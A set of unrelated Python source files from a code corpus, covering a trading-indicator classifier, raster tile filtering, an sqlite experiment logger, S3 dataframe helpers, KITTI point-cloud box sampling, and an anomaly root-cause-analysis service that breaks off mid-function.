# dfPercentage["Percentage"] = None
for i in range(1, len(inputdf)):
# if dfPercentage.loc[i,"close"]>dfPercentage.loc[i,"open"]:
# percentage = ((dfPercentage.loc[i,"high"] - dfPercentage.loc[i-1,"close"])/ dfPercentage.loc[i-1,"close"])*100
# else:
# percentage = (( dfPercentage.loc[i,"low"] - dfPercentage.loc[i-1,"close"] )/ dfPercentage.loc[i-1,"close"])*100
if dfPercentage.loc[ i - 1, "close"] == 0.0:
percentage = 0
else:
percentage = ((dfPercentage.loc[i, "close"] - dfPercentage.loc[i - 1, "close"]) / dfPercentage.loc[ i - 1, "close"]) * 100.0
dfPercentage.loc[i, "Perentage"] = percentage
dfPercentage = dfPercentage.fillna(0)
dfPercentage = dfPercentage.replace(np.inf, 0)
if export2csv == True:
dfPercentage.to_csv(self.exportpath + "Percentage_" + str(self.collection) + ".csv", index=True, header=True)
return dfPercentage
def dfMACD(self, inputdf, n, export2csv=False):
"""调用talib方法计算MACD指标,写入到df并输出"""
dfMACD = inputdf
for i in range(n, len(inputdf)):
df_ne = inputdf.loc[i - n + 1:i, :]
macd,signal,hist = talib.MACD(np.array(df_ne["close"]),12,26,9)
dfMACD.loc[i, "macd"] = macd[-1]
dfMACD.loc[i, "signal"] = signal[-1]
dfMACD.loc[i, "hist"] = hist[-1]
dfMACD = dfMACD.fillna(0)
dfMACD = dfMACD.replace(np.inf, 0)
if export2csv == True:
dfMACD.to_csv(self.exportpath + "macd" + str(self.collection) + ".csv", index=True, header=True)
return dfMACD
def dfSTD(self, inputdf, n, export2csv=False):
"""调用talib方法计算MACD指标,写入到df并输出"""
dfSTD = inputdf
for i in range(n, len(inputdf)):
df_ne = inputdf.loc[i - n + 1:i, :]
std = talib.STDDEV(np.array(df_ne["close"]),n)
dfSTD.loc[i, "std"] = std[-1]
dfSTD = dfSTD.fillna(0)
dfSTD = dfSTD.replace(np.inf, 0)
if export2csv == True:
dfSTD.to_csv(self.exportpath + "dfSTD" + str(self.collection) + ".csv", index=True, header=True)
return dfSTD
#-----------------------------------------加入趋势分类-------------------------------------------------
def addTrend(self, inputdf, trendsetp=6, export2csv=False):
"""以未来6个bar的斜率线性回归为判断分类是否正确"""
dfTrend = inputdf
for i in range(1, len(dfTrend) - trendsetp - 1):
histRe = np.array(dfTrend["close"])[i:i + trendsetp]
xAixs = np.arange(trendsetp) + 1
res = st.linregress(y=histRe, x=xAixs)
if res.pvalue < self.pValue + 0.01:
if res.slope > 0.5:
dfTrend.loc[i, "tradeindictor"] = 1
elif res.slope < -0.5:
dfTrend.loc[i, "tradeindictor"] = -1
dfTrend = dfTrend.fillna(0)
dfTrend = dfTrend.replace(np.inf, 0)
if export2csv == True:
dfTrend.to_csv(self.exportpath + "addTrend" + str(self.collection) + ".csv", index=True, header=True)
return dfTrend
def GirdValuate(X_train, y_train):
"""1)LogisticRegression
逻辑回归
2)DecisionTreeClassifier
决策树
3)SVC
支持向量分类
4)MLP
神经网络"""
clf_DT=DecisionTreeClassifier()
param_grid_DT= {'max_depth': [1,2,3,4,5,6]}
clf_Logit=LogisticRegression()
param_grid_logit= {'solver': ['liblinear','lbfgs','newton-cg','sag']}
clf_svc=SVC()
param_grid_svc={'kernel':('linear', 'poly', 'rbf', 'sigmoid'),
'C':[1, 2, 4],
'gamma':[0.125, 0.25, 0.5 ,1, 2, 4]}
clf_mlp = MLPClassifier()
param_grid_mlp= {"hidden_layer_sizes": [(100,), (100, 30)],
"solver": ['adam', 'sgd', 'lbfgs'],
"max_iter": [20],
"verbose": [False]
}
#打包参数集合
clf=[clf_DT,clf_Logit,clf_mlp,clf_svc]
param_grid=[param_grid_DT,param_grid_logit,param_grid_mlp,param_grid_svc]
from sklearn.model_selection import StratifiedKFold # 交叉验证
kflod = StratifiedKFold(n_splits=10, shuffle=True, random_state=7) # 将训练/测试数据集划分10个互斥子集,这样方便多进程测试
#网格测试
for i in range(0,4):
grid=GridSearchCV(clf[i], param_grid[i], scoring='accuracy',n_jobs = -1,cv = kflod)
grid.fit(X_train, y_train)
print (grid.best_params_,': ',grid.best_score_)
if __name__ == '__main__':
# 读取数据
# exportpath = "C:\\Users\shui0\OneDrive\Documents\Project\\"
exportpath = "C:\Project\\"
DA = DataAnalyzerforSklearn(exportpath)
#数据库导入
start = datetime.strptime("20180501", '%Y%m%d')
end = datetime.strptime("20190501", '%Y%m%d')
df = DA.db2df(db="VnTrader_1Min_Db", collection="rb8888", start = start, end = end)
df5min = DA.df2Barmin(df, 5)
df5minAdd = DA.addTrend(df5min, export2csv=True)
df5minAdd = DA.dfMACD(df5minAdd, n=34, export2csv=True)
df5minAdd = DA.dfatr(df5minAdd, n=25, export2csv=True)
df5minAdd = DA.dfrsi(df5minAdd, n=35, export2csv=True)
df5minAdd = DA.dfcci(df5minAdd,n = 30,export2csv=True)
df5minAdd = DA.dfSTD(df5minAdd, n=30, export2csv=True)
df5minAdd = DA.Percentage(df5minAdd,export2csv = True)
#划分测试验证。
df_test = df5minAdd.loc[60:,:] #只从第60个开始分析,因为之前很多是空值
y= np.array(df_test["tradeindictor"]) #只保留结果趋势结果,转化为数组
X = df_test.drop(["tradeindictor","close","datetime","high","low","open","volume"],axis = 1).values #不是直接分析HLOC,只保留特征值,转化为数组
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.3,random_state=0) #三七
print("训练集长度: %s, 测试集长度: %s" %(len(X_train),len(X_test)))
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import SelectPercentile
from sklearn.feature_selection import mutual_info_classif
#特征工作,可以按照百分比选出最高分特征类,取最优70%,也可以用SelectKBest,指定要几个特征类。
print(X_train.shape)
selectPer = SelectPercentile(mutual_info_classif, percentile=70)
# selectPer = SelectKBest(mutual_info_classif, k=7)
X_train = selectPer.fit_transform(X_train, y_train)
print(X_train.shape)
X_test = selectPer.transform(X_test)
# 也可以用Fpr选择
# selectFea=SelectFpr(alpha=0.01)
# X_train_new = selectFea.fit_transform(X_train, y_train)
# X_test_new = selectFea.transform(X_test)
# 这里使用下面模式进行分析,然后利用网格调参
GirdValuate(X_train,y_train)
# 使用选取最好的模型,进行测试看看拼接
# • 模型预测:model.predict()
# • Accuracy:metrics.accuracy_score()
# • Presicion:metrics.precision_score()
# • Recall:metrics.recall_score()
from sklearn import metrics
clf_selected=MLPClassifier(hidden_layer_sizes=(100,30), max_iter=20, solver='adam') #此处填入网格回测最优模型和参数,
# {'hidden_layer_sizes': (100, 30), 'max_iter': 20, 'solver': 'adam', 'verbose': False} : 0.9897016507648039
clf_selected.fit(X_train, y_train)
y_pred = clf_selected.predict(X_test)
#accuracy
accuracy=metrics.accuracy_score(y_true=y_test, y_pred=y_pred)
print ('accuracy:',accuracy)
#precision
precision=metrics.precision_score(y_true=y_test, y_pred=y_pred,average="micro")
print ('precision:',precision)
#recall
recall=metrics.recall_score(y_true=y_test, y_pred=y_pred,average="micro")
print ('recall:',recall)
#实际值和预测值
print (y_test)
print (y_pred)
dfresult = pd.DataFrame({'Actual':y_test,'Predict':y_pred})
dfresult.to_csv(exportpath + "result" + ".csv", index=True, header=True)
from sklearn.externals import joblib
#模型保存到本地
joblib.dump(clf_selected,'clf_selected.m')
#模型的恢复
clf_tmp=joblib.load('clf_selected.m') |
<reponame>gfrancis-ALElab/Arctic_UNet
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 23 10:06:45 2021
Functions for filtering tiles if containing areas of no data
@author: <NAME>
email: <EMAIL>
"""
import os
import numpy as np
import glob
import rasterio
import rasterio.features as features
import pandas as pd
import geopandas as gpd
import matplotlib.pyplot as plt
from PIL import Image
from shapely import speedups
speedups.disable()
from shapely.geometry import shape
import warnings
warnings.filterwarnings("ignore")
###return True if bad & False if good
def data_check(M):
return ((len(np.unique(M)) == 1) or (np.unique(M)[0] == 0))
def get_name(file_location):
filename = file_location.split('/')[-1]
filename = filename.split('.')
return filename[0]
def remove(lib, truths, overlap_only=True):
total_tiles = len([name for name in os.listdir(lib)
if os.path.isfile(lib + '/' + name)])
### keep only overlap tiles
if overlap_only:
print('\nFiltering non-intersecting tiles...')
count = 0
r = 0
for pic in glob.glob(lib + '/*.tif'):
geo_list = []
with rasterio.open(pic) as dataset:
# copy meta data for mask
meta = dataset.meta.copy()
# Read the dataset's valid data mask as a ndarray.
mask = dataset.dataset_mask()
# Extract feature shapes and values from the array.
for g, val in rasterio.features.shapes(
mask, transform=dataset.transform):
# Transform shapes from the dataset's own coordinate
geom = rasterio.warp.transform_geom(
dataset.crs, dataset.crs, g, precision=6)
geo_list.append(geom)
l = []
for k in range(len(geo_list)):
l.append(shape(geo_list[k]))
df = pd.DataFrame(l)
raster_outline = gpd.GeoDataFrame(geometry=df[0], crs=dataset.crs)
### only consider ground truths included in current patch to save time
intersection = gpd.overlay(truths, raster_outline, how='intersection')
if intersection.empty == True:
# print('Removing: %s'%pic)
os.remove(pic)
r += 1
# else:
# fn = get_name(pic)
# print('Ground Truth Overlap at: %s'%fn)
count += 1
print('Total removed: %s'%r)
print('%s files remaining'%(total_tiles-r))
print('Re-numbering...')
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/n%s.tif'%count)
count += 1
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/%s.tif'%count)
count += 1
print('\nFiltering any remaining bad tiles...')
for pic in glob.glob(lib + '/*.tif'):
# print('Filtering: %s / %s'%(count+1, total_tiles))
img = Image.open(pic)
geo_list = []
with rasterio.open(pic) as dataset:
# Read the dataset's metadata
meta = dataset.meta.copy()
### remove tile if missing data (blank white areas)
if data_check(img):
dataset.close()
os.remove(pic)
r += 1
continue
### remove if not square
if meta['height'] != meta['width']:
dataset.close()
os.remove(pic)
r += 1
print('Total removed: %s'%r)
print('%s files remaining'%(total_tiles-r))
print('Re-numbering...')
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/n%s.tif'%count)
count += 1
count = 0
for pic in glob.glob(lib + '/*.tif'):
os.rename(pic, lib + '/%s.tif'%count)
count += 1
return
|
<reponame>JonasDHomburg/LAMARCK<gh_stars>1-10
import sqlite3 as db
import time
import os
from LAMARCK_ML.individuals import IndividualInterface
from LAMARCK_ML.models.models import GenerationalModel
from LAMARCK_ML.reproduction import AncestryEntity
from LAMARCK_ML.reproduction.Ancestry_pb2 import AncestryProto
from LAMARCK_ML.utils.dataSaver.dbConnection import DBConstants
from LAMARCK_ML.utils.dataSaver.interface import DataSaverInterface
from LAMARCK_ML.individuals.implementations.NetworkIndividual_pb2 import NetworkIndividualProto
from LAMARCK_ML.individuals.Individual_pb2 import IndividualProto
class DSSqlite3(DataSaverInterface):
arg_FILE = 'file'
arg_SAVE_ALL = 'save_all'
def __init__(self, **kwargs):
super(DSSqlite3, self).__init__(**kwargs)
self.save_all = kwargs.get(self.arg_SAVE_ALL, False)
self._file = kwargs.get(self.arg_FILE, 'default.db3')
self._path = os.path.dirname(self._file)
if self._path == '':
self._path = './'
if (not os.path.exists(self._path)) and (self._path != ''):
os.makedirs(self._path)
self.conn = db.connect(self._file)
self.setup_db()
def __del__(self):
self.conn.close()
def setup_db(self):
cursor = self.conn.cursor()
while True:
try:
cursor.execute(
"CREATE TABLE IF NOT EXISTS {} (rowid INTEGER PRIMARY KEY autoincrement, real_timestamp INTEGER, "
"abstract_timestamp INTEGER, id_name TEXT, serialized_file TEXT);".format(
DBConstants.table_individual.value[0]))
except db.OperationalError:
continue
break
while True:
try:
cursor.execute(
"CREATE TABLE IF NOT EXISTS {} (rowid INTEGER PRIMARY KEY autoincrement, real_timestamp INTEGER, "
"abstract_timestamp INTEGER, operation VARCHAR(8), descendant TEXT, serialized BLOB)".format(
DBConstants.table_ancestry.value[0]))
except db.OperationalError:
continue
break
self.conn.commit()
cursor.close()
def get_individual_by_name(self, name):
# cursor = self.conn.cursor()
# cursor.execute("SELECT serialized FROM {} WHERE id_name=?".format(DBConstants.table_individual.value[0]), [name])
# fetched = cursor.fetchone()
# last = None
# while fetched:
# last = fetched[0]
# fetched = cursor.fetchone()
# cursor.close()
with open(self._path + '/' + name + '.pb', 'rb') as f:
last = f.read()
ind = IndividualInterface.__new__(IndividualInterface)
ind.__setstate__(last)
return ind
def end_evaluate(self, func):
def end_evaluate_wrapper(model: GenerationalModel):
real_timestamp = int(time.time())
abstract_timestamp = model.abstract_timestamp
statement = "INSERT INTO {} (real_timestamp, abstract_timestamp, id_name, serialized_file) " \
"VALUES (?, ?, ?, ?);".format(DBConstants.table_individual.value[0])
for individual in model.generation:
cursor = self.conn.cursor()
cursor.execute(statement, [real_timestamp,
abstract_timestamp,
individual.id_name,
individual.id_name + '.pb'])
self.conn.commit()
cursor.close()
with open(self._path + '/' + individual.id_name + '.pb', 'wb') as f:
_bytes = individual.__getstate__()
f.write(_bytes)
del _bytes
func()
return end_evaluate_wrapper
def end_reproduce(self, func):
def end_reproduce_wrapper(model):
real_timestamp = int(time.time())
abstract_timestamp = model.abstract_timestamp
statement_rep = "INSERT INTO {} (real_timestamp, abstract_timestamp, operation, descendant, serialized) " \
"VALUES (?, ?, ?, ?, ?);".format(
DBConstants.table_ancestry.value[0])
if self.save_all:
statement_ind = "INSERT INTO {} (real_timestamp, abstract_timestamp, id_name, serialized_file) " \
"VALUES (?, ?, ?, ?);".format(DBConstants.table_individual.value[0])
for pool in model._REPRODUCTION_POOLS:
for individual in pool:
cursor = self.conn.cursor()
cursor.execute(statement_ind, [real_timestamp,
abstract_timestamp,
individual.id_name,
individual.id_name + '.pb'])
with open(self._path + '/' + individual.id_name + '.pb', 'wb') as f:
_bytes = individual.__getstate__()
f.write(_bytes)
f.close()
self.conn.commit()
cursor.close()
del _bytes
for _, ancestry in model.reproduction:
for anc in ancestry:
cursor = self.conn.cursor()
_state = anc.__getstate__()
cursor.execute(statement_rep, [real_timestamp,
abstract_timestamp,
anc.method,
anc.descendant,
db.Binary(_state)])
self.conn.commit()
cursor.close()
del _state
func()
return end_reproduce_wrapper
def get_ancestry_for_ind(self, ind_name):
cursor = self.conn.cursor()
cursor.execute("SELECT abstract_timestamp, serialized FROM {} WHERE descendant=?;".format(
DBConstants.table_ancestry.value[0]), [ind_name])
fetched = cursor.fetchone()
last = None
while fetched:
last = fetched
fetched = cursor.fetchone()
cursor.close()
if last is None:
return None, None
pb = AncestryProto()
pb.ParseFromString(last[1])
return last[0], AncestryEntity.from_pb(pb)
def get_ancestries(self):
cursor = self.conn.cursor()
while True:
try:
cursor.execute("SELECT abstract_timestamp, serialized FROM {};".format(
DBConstants.table_ancestry.value[0]))
except db.OperationalError:
continue
break
result = []
for abstract_time, pb_bytes in cursor.fetchall():
pb = AncestryProto()
pb.ParseFromString(pb_bytes)
result.append((abstract_time, AncestryEntity.from_pb(pb)))
cursor.close()
return result
def get_individual_names(self):
    """Return the set of all individual id_names stored in the database."""
    cursor = self.conn.cursor()
    # Keep retrying while the database is locked by a concurrent writer.
    done = False
    while not done:
        try:
            cursor.execute("SELECT id_name FROM {};".format(DBConstants.table_individual.value[0]))
            done = True
        except db.OperationalError:
            pass
    names = set(row[0] for row in cursor.fetchall())
    cursor.close()
    return names
def time_stamps_by_individual_name(self, individual_name):
    """Return all (real_timestamp, abstract_timestamp) pairs recorded for
    the given individual id_name.

    Retries while the database reports busy (db.OperationalError).
    NOTE(review): busy-wait without backoff.
    """
    cursor = self.conn.cursor()
    while True:
        try:
            cursor.execute("SELECT real_timestamp, abstract_timestamp FROM {} WHERE id_name=?;".format(
                DBConstants.table_individual.value[0]), [individual_name])
        except db.OperationalError:
            continue
        break
    result = cursor.fetchall()
    cursor.close()
    return result
def get_abstract_time_stamps(self):
    """Return all distinct abstract timestamps present in the individuals table."""
    cursor = self.conn.cursor()
    statement = "SELECT DISTINCT abstract_timestamp FROM {};".format(
        DBConstants.table_individual.value[0])
    # Keep retrying while the database is locked by a concurrent writer.
    while True:
        try:
            cursor.execute(statement)
            break
        except db.OperationalError:
            continue
    timestamps = [row[0] for row in cursor.fetchall()]
    cursor.close()
    return timestamps
def get_individual_names_by_abstract_time_stamp(self, time_stamp):
    """Return the id_names of all individuals recorded at the given abstract timestamp."""
    cursor = self.conn.cursor()
    statement = "SELECT id_name FROM {} WHERE abstract_timestamp=?;".format(
        DBConstants.table_individual.value[0])
    cursor.execute(statement, [time_stamp])
    names = [row[0] for row in cursor.fetchall()]
    cursor.close()
    return names
def get_individual_metrics(self, name):
    """Read the serialized protobuf '<name>.pb' from self._path and return
    a dict mapping metric id_name -> value.

    :param name: id_name of the individual ('<name>.pb' must exist)
    """
    with open(self._path + '/' + name + '.pb', 'rb') as f:
        last = f.read()
    proto = NetworkIndividualProto()
    # proto = IndividualProto()
    proto.ParseFromString(last)
    return dict([(m.id_name, m.value) for m in proto.baseIndividual.metrics])
    # return dict([(m.id_name, m.value) for m in proto.metrics])
def get_individual_functions(self, name):
    """Return the id_names of the functions of the first network of the
    serialized individual `name` (read from '<name>.pb' in self._path)."""
    pb_path = self._path + '/' + name + '.pb'
    with open(pb_path, 'rb') as handle:
        raw = handle.read()
    proto = NetworkIndividualProto()
    proto.ParseFromString(raw)
    return [fn.id_name for fn in proto.networks[0].functions]
|
<reponame>decathloncanada/data-utils<filename>data_utils/df.py
# -*- coding: utf-8 -*-
"""
data_utils.df
~~~~~~~~~~~~~
This module contains the functions related to dataframe manipulation.
"""
import os
import io
import pandas as pd
import numpy as np
import tablib
from .utils import (_clear_model_table,
_convert_df_to_dataset,
_create_filepath_if_nonexistent)
def import_s3_csv_to_df(s3client,
                        bucket,
                        key,
                        sep=';',
                        header=0,
                        compression='gzip',
                        usecols=None,
                        dtype=None,
                        error_bad_lines=False,
                        drop_id=True):
    """
    Return a dataframe based on the compressed csv at the given key in the given bucket.

    :s3client: boto3.session.Session.client that represents a connection with s3
    :bucket: string representing the s3 bucket's name
    :key: string representing the filepath in the s3 bucket
    :sep: string representing the separator in the compressed csv, default: ';'
    :header: row number to use as the column names, default: 0
    :compression: string representing the type of compression on the file, default: 'gzip'
    :usecols: list of attributes to read from the csv
    :dtype: dictionary {attribute name: object type}
    :error_bad_lines: if True, raise on malformed lines; if False, skip them
    :drop_id: drop a duplicate 'id' column if present, default: True
    """
    response = s3client.get_object(Bucket=bucket, Key=key)
    raw = response['Body'].read()
    read_kwargs = dict(sep=sep,
                       header=header,
                       compression=compression,
                       dtype=dtype,
                       usecols=usecols)
    try:
        df = pd.read_csv(io.BytesIO(raw),
                         error_bad_lines=error_bad_lines,
                         **read_kwargs)
    except TypeError:
        # pandas >= 2.0 removed error_bad_lines; on_bad_lines replaces it
        # ('error' raises, 'warn' skips with a warning like the old False).
        df = pd.read_csv(io.BytesIO(raw),
                         on_bad_lines='error' if error_bad_lines else 'warn',
                         **read_kwargs)
    if drop_id:
        # Drop the duplicate 'id' column; errors='ignore' makes this a no-op
        # when the column is absent (replaces the old try/except KeyError).
        df.drop('id', axis=1, inplace=True, errors='ignore')
    return df
def list_s3_keys_in_bucket(s3client,
                           bucket,
                           prefix=''):
    """
    Return a list of the keys situated at the given prefix in the given bucket.

    :s3client: boto3.session.Session.client that represents a connection with s3
    :bucket: string representing the s3 bucket's name
    :prefix: string representing the base filepath to search at in the s3 bucket, default: ''

    NOTE: list_objects returns at most 1000 keys per call; pagination is not
    handled here.
    """
    response = s3client.list_objects(Bucket=bucket, Prefix=prefix)
    # 'Contents' is absent when nothing matches the prefix: return [] instead
    # of raising KeyError (robustness fix).
    return [obj['Key'] for obj in response.get('Contents', [])]
def convert_df_to_s3_compressed_csv(df,
                                    s3client,
                                    bucket,
                                    key,
                                    sep=';',
                                    compression='gzip'):
    """
    Compress a dataframe into a csv and upload it to the bucket at the key.

    :df: pandas.DataFrame to convert into a compressed csv
    :s3client: boto3.session.Session.client that represents a connection with s3
    :bucket: string representing the s3 bucket's name
    :key: string representing the filepath in the s3 bucket
    :sep: string representing the separator in the compressed csv, default: ';'
    :compression: string representing the type of compression on the file, default: 'gzip'
    """
    import tempfile
    # Use a unique temp file instead of the fixed './tmp_gzip_csv' so
    # concurrent calls cannot clobber each other's output.
    fd, tmp_file = tempfile.mkstemp(suffix='.csv.gz')
    os.close(fd)
    try:
        convert_df_to_csv(df, filepath=tmp_file, sep=sep, compression=compression)
        s3client.upload_file(Filename=tmp_file,
                             Bucket=bucket,
                             Key=key)
    finally:
        # Always remove the temp file, even when conversion or upload fails
        # (the old version leaked it on any exception).
        os.remove(tmp_file)
def convert_df_to_csv(df, filepath, index_label='id', sep=',', encoding='utf-8', compression=None):
    """
    Write a given dataframe to a csv at the filepath using the other
    arguments as specifications.

    :df: pandas.DataFrame to convert (left unmodified)
    :filepath: string representing what path to save the csv to
    :index_label: string representing the column label for the index column, default: 'id'
    :sep: string representing the wanted separator in the csv, default: ','
    :encoding: string representing the encoding to use in the output file, default: 'utf-8'
    :compression: compression passed through to DataFrame.to_csv, default: None
    """
    _create_filepath_if_nonexistent(filepath)
    # Work on a copy: the previous version filled NaNs in place and
    # re-indexed the caller's dataframe — a surprising side effect.
    out = df.fillna(0.0)
    # 1-based index so the written 'id' column starts at 1.
    out.index = np.arange(1, len(out) + 1)
    out.to_csv(filepath,
               index_label=index_label,
               sep=sep,
               encoding=encoding,
               compression=compression)
def convert_df_to_django_model(df,
                               model,
                               rewrite=False,
                               rows_at_a_time=250):
    """
    Import a given dataframe to Django's ORM with a specified model.

    :df: pandas.Dataframe to convert
    :model: django.db.models.Model's name. The ORM takes care of which table to put the data in
    :rewrite: boolean representing whether to delete the old entries or not, default: False
    :rows_at_a_time: int representing the amount of rows to import at the same time, default: 250
    """
    # import_export is only importable inside a configured Django project.
    if os.getenv('DJANGO_SETTINGS_MODULE'):
        from import_export import resources
    else:
        raise Exception('This function can only be used in Django projects.')
    if rewrite:
        _clear_model_table(model)
    try:
        # Since Django's ORM uses incremental IDs by default
        # we need to go and take the next 'available' one
        # if the query returns none, then we start at 0
        query = model.objects.values('id').order_by('-id').first()
        last_id = query['id'] + 1 if query is not None else 0
        dataset = _convert_df_to_dataset(df, last_id)
        p_resource = resources.modelresource_factory(model=model)()
        # Import in chunks to bound memory use per import_data call.
        for i in range(0, len(dataset), rows_at_a_time):
            data = tablib.Dataset(*dataset[i:i+rows_at_a_time],
                                  headers=dataset.headers)
            p_resource.import_data(data)
    except Exception as err:
        # NOTE(review): this swallows every exception and returns None
        # (print() returns None), so callers cannot distinguish success
        # from failure — consider logging and re-raising.
        return print(err)
|
<gh_stars>1-10
import pickle
import itertools
import numpy as np
import os.path as osp
from tqdm import tqdm
from collections import defaultdict
from .kitti_utils import read_velo
def points_in_convex_polygon(points, polygon, ccw=True):
    """Vectorized point-in-convex-polygon test.

    points (N, 2) | polygon (M, V, 2) | returns boolean mask (N, M).
    ccw indicates counter-clockwise vertex order.
    """
    # Edge vectors, oriented so interior points give a positive cross
    # product against the vertex-to-point vectors.
    previous_vertices = np.roll(polygon, shift=1, axis=1)
    edges = ((-1) ** ccw) * (polygon - previous_vertices)[None]
    to_point = polygon[None] - points[:, None, None]
    inside = (np.cross(edges, to_point) > 0).all(axis=2)
    return inside
def center_to_corner_box2d(boxes):
    """
    :boxes np.ndarray shape (N, 7) — columns (x, y, z, w, l, h, yaw)
    :corners np.ndarray shape (N, 4, 2) (counter-clockwise)
    """
    xy, _, wl, _, yaw = np.split(boxes, [2, 3, 5, 6], 1)
    cos_t, sin_t = np.cos(yaw), np.sin(yaw)
    rotation = np.stack([cos_t, -sin_t, sin_t, cos_t], -1).reshape(-1, 2, 2)
    # Unit square corners, counter-clockwise, scaled by half extents.
    unit = np.array([[-1.0, -1.0], [1.0, -1.0], [1.0, 1.0], [-1.0, 1.0]])
    local = 0.5 * wl[:, None] * unit
    # Rotate each local corner by the box yaw, then translate to the center.
    return np.einsum('ijk,imk->imj', rotation, local) + xy[:, None]
class PointsInCuboids:
    """Select, for each box, the points that fall inside it.

    Takes ~10ms for each scene.
    """

    def __init__(self, points):
        # points: (N, D) array; columns 0-2 are x, y, z.
        self.points = points

    def _height_threshold(self, boxes):
        """Boolean (N, M) mask of points within each box's vertical extent."""
        point_z = self.points[:, None, 2]
        box_z, box_h = boxes[:, [2, 5]].T
        lower = box_z - box_h / 2
        upper = box_z + box_h / 2
        return (point_z > lower) & (point_z < upper)

    def _get_mask(self, boxes):
        """Combine the vertical-slice test with the birds-eye polygon test."""
        footprints = center_to_corner_box2d(boxes)
        inside = self._height_threshold(boxes)
        inside &= points_in_convex_polygon(self.points[:, :2], footprints)
        return inside

    def __call__(self, boxes):
        """Return list of point arrays, one per box."""
        per_box = self._get_mask(boxes).T
        return [self.points[selected] for selected in per_box]
class PointsNotInRectangles(PointsInCuboids):
    """Complement selection: keep points outside every box footprint.

    Unlike the parent class, only the birds-eye (2D) test is applied —
    there is no height filtering.
    """

    def _get_mask(self, boxes):
        footprints = center_to_corner_box2d(boxes)
        return points_in_convex_polygon(self.points[:, :2], footprints)

    def __call__(self, boxes):
        """Return array of points not in any box."""
        outside = ~self._get_mask(boxes).any(1)
        return self.points[outside]
class DatabaseBuilder:
    """Build and cache a database of per-object point clouds, keyed by
    class index, for use in sample-based augmentation."""

    def __init__(self, cfg, annotations):
        self.cfg = cfg
        self.fpath = osp.join(cfg.DATA.CACHEDIR, 'database.pkl')
        if osp.isfile(self.fpath):
            # Cache hit — nothing to rebuild.
            print(f'Found cached database: {self.fpath}')
            return
        self._build(annotations)

    def _build(self, annotations):
        database = defaultdict(list)
        for item in tqdm(annotations.values(), desc='Building database'):
            keys, samples = self._process_item(item)
            for key, sample in zip(keys, samples):
                database[key] += [sample]
        self._save_database(dict(database))

    def _demean(self, points, boxes):
        """Subtract each box's center (birds eye view) from its points and box."""
        centered_points, centered_boxes = [], []
        for pts, box in zip(points, boxes):
            center, zwlhr = np.split(box, [2])
            xy, z_rest = np.split(pts, [2], 1)
            centered_points.append(np.concatenate((xy - center, z_rest), 1))
            centered_boxes.append(np.concatenate((0 * center, zwlhr)))
        return centered_points, centered_boxes

    def _process_item(self, item):
        """Retrieve points in each sufficiently-populated box in the scene."""
        points = read_velo(item['velo_path'])
        class_idx, boxes = item['class_idx'], item['boxes']
        points = PointsInCuboids(points)(boxes)
        # Discard boxes with too few points to make useful samples.
        keep = [len(p) > self.cfg.AUG.MIN_NUM_SAMPLE_PTS for p in points]
        class_idx, points, boxes = [
            itertools.compress(seq, keep) for seq in (class_idx, points, boxes)]
        points, boxes = self._demean(points, boxes)
        samples = [dict(points=p, box=b) for p, b in zip(points, boxes)]
        return class_idx, samples

    def _save_database(self, database):
        with open(self.fpath, 'wb') as f:
            pickle.dump(database, f)
|
<reponame>LeiSoft/CueObserve<filename>api/anomaly/services/rootCauseAnalyses.py<gh_stars>100-1000
import json
import logging
import traceback
import datetime as dt
import dateutil.parser as dp
from utils.apiResponse import ApiResponse
from ops.tasks import rootCauseAnalysisJob
from app.celery import app
from anomaly.models import RootCauseAnalysis, RCAAnomaly, Anomaly
from anomaly.serializers import RootCauseAnalysisSerializer, RCAAnomalySerializer
from ops.tasks.detection.core.anomalyDetection import detect, dataFrameEmpty
logger = logging.getLogger(__name__)
class RootCauseAnalyses:
    """
    Class to deal with functionalities associated with RCA
    (root cause analysis of detected anomalies).
    """

    @staticmethod
    def calculateRCA(anomalyId: int):
        """
        Trigger job for RCA calculation
        :param anomalyId: id of anomaly object needed to be analyzed
        """
        res = ApiResponse("Error in triggering RCA calculation")
        rootCauseAnalysis, _ = RootCauseAnalysis.objects.get_or_create(
            anomaly_id=anomalyId
        )
        rootCauseAnalysis.status = RootCauseAnalysis.STATUS_RECEIVED
        rootCauseAnalysis.save()
        # Queue the celery job only after the RECEIVED status is persisted.
        task = rootCauseAnalysisJob.delay(anomalyId)
        # Re-fetch so we don't clobber fields the job may already have written.
        rootCauseAnalysis = RootCauseAnalysis.objects.get(anomaly_id=anomalyId)
        # Record every task id so abortRCA can revoke them later.
        rootCauseAnalysis.taskIds = [*rootCauseAnalysis.taskIds, task.id]
        rootCauseAnalysis.save()
        res.update(True, "Successfully triggered RCA calculation")
        return res

    @staticmethod
    def getRCA(anomalyId: int):
        """
        Get data for RCA
        :param anomalyId: id of anomaly object whose RCA to be fetched
        """
        res = ApiResponse("Error in getting RCA")
        anomaly = Anomaly.objects.get(id=anomalyId)
        # Per-dimension anomalies, highest latest value first.
        rcaAnomalies = RCAAnomaly.objects.filter(anomaly_id=anomalyId).order_by(
            "-data__anomalyLatest__value"
        )
        rcaAnomaliesData = RCAAnomalySerializer(rcaAnomalies, many=True).data
        # Defaults for when no RootCauseAnalysis row exists yet.
        data = {
            "status": None,
            "logs": None,
            "startTimestamp": None,
            "endTimestamp": None,
        }
        if hasattr(anomaly, "rootcauseanalysis"):
            data = {
                **data,
                **RootCauseAnalysisSerializer(anomaly.rootcauseanalysis).data,
            }
        data = {
            **data,
            "granularity": anomaly.anomalyDefinition.dataset.granularity,
            "measure": anomaly.anomalyDefinition.metric,
            "dimension": anomaly.anomalyDefinition.dimension,
            "dimensionValue": anomaly.dimensionVal,
            "value": anomaly.data["anomalyLatest"]["value"],
            "anomalyContribution": anomaly.data["contribution"],
            "rcaAnomalies": rcaAnomaliesData,
            "anomalyTime": anomaly.data["anomalyLatest"]["anomalyTimeISO"],
        }
        res.update(True, "Successfully retrieved RCA", data)
        return res

    @staticmethod
    def abortRCA(anomalyId: int):
        """
        Abort RCA
        :param anomalyId: id of anomaly object whose RCA needs to be aborted
        """
        res = ApiResponse("Error in aborting RCA")
        try:
            rootCauseAnalysis = RootCauseAnalysis.objects.get(anomaly_id=anomalyId)
            # Revoke every celery task queued for this analysis.
            app.control.revoke(rootCauseAnalysis.taskIds, terminate=True)
